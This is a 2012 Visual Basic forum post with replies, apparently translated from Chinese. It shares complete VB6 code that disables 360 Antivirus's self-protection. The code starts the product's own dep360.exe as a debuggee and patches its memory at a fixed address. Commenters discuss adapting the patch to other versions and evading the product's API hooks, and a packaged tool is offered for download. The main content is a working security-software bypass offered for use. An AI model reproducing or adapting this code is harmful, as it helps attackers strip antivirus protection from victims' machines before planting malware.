VB Enthusiasts' Paradise (VBGood)
Unbelievable, it turns out disabling 360 Antivirus's self-protection is this simple...

2012-8-7 17:53 | Publisher: acme_pjz | Views: 1292 | Comments: 5 | Original author: wtywtykk | Source: 360

I was studying 360 Antivirus's self-protection today and stumbled on this by accident.
The code below is fairly simple; it does not obtain the path automatically, so anyone with a different path will have to change it themselves. Tested on Win7 x64 with 360sd 3.1.0.3073.
Option Explicit

' Win32 structures used by CreateProcess
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Const SW_NORMAL = 1
Private Const DEBUG_PROCESS = &H1
Private Const NORMAL_PRIORITY_CLASS = &H20

' kernel32 API declarations
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function DebugActiveProcessStop Lib "kernel32" (ByVal dwProcessId As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

' Hard-coded path and argument; adjust the path for your installation
Private Const FileName = "C:\Program Files (x86)\360\360sd\dep360.exe"
Private Const CommandLine = "/shutdownsdsp"

Public Sub Main()
    Dim SI As STARTUPINFO
    Dim PI As PROCESS_INFORMATION
    SI.cb = Len(SI)

    ' Start the target as a debuggee so its memory can be written before it runs
    If CreateProcess(FileName, CommandLine, 0, 0, 0, NORMAL_PRIORITY_CLASS Or DEBUG_PROCESS, ByVal 0, App.Path, SI, PI) Then
        ' Bytes patched into the target at a fixed address (specific to 360sd 3.1.0.3073)
        Dim b(255) As Byte
        b(0) = &H6A
        b(1) = &H1

        b(2) = &HE8
        b(3) = &HD7
        b(4) = &H7D
        b(5) = &HFC
        b(6) = &HFF

        b(7) = &HC3

        WriteProcessMemory PI.hProcess, ByVal &H447422, b(0), 255, 0&
        ' Detach from the debuggee so it continues running
        DebugActiveProcessStop PI.dwProcessId
        CloseHandle PI.hProcess
        CloseHandle PI.hThread
    Else
        MsgBox "错误" & Err.LastDllError & "启动进程失败", vbCritical
    End If
End Sub


Latest comments

Quote 红色狂想 2012-8-7 18:34
Does this not work on any x86 platform at all?
Quote wtywtykk 2012-8-7 18:49
红色狂想 posted on 2012-8-7 18:34
Does this not work on any x86 platform at all?

I don't know; I currently can't find a 32-bit Win7. Testing showed that 250 has hooked WriteProcessMemory and DebugActiveProcessStop. DebugActiveProcessStop doesn't matter much, but WriteProcessMemory being unusable means... Also, this only works on 3.1.0.3037; for other versions the address and assembly bytes must be changed.
Quote h907308901 2012-8-8 08:08
How about CREATE_SUSPEND + NtResumeProcess?
Quote wtywtykk 2012-8-8 22:06
OFF3602.zip (10.96 KB, downloads: 804)
Quote zhdgzhdg 2012-8-9 09:44
Simple and effective indeed.
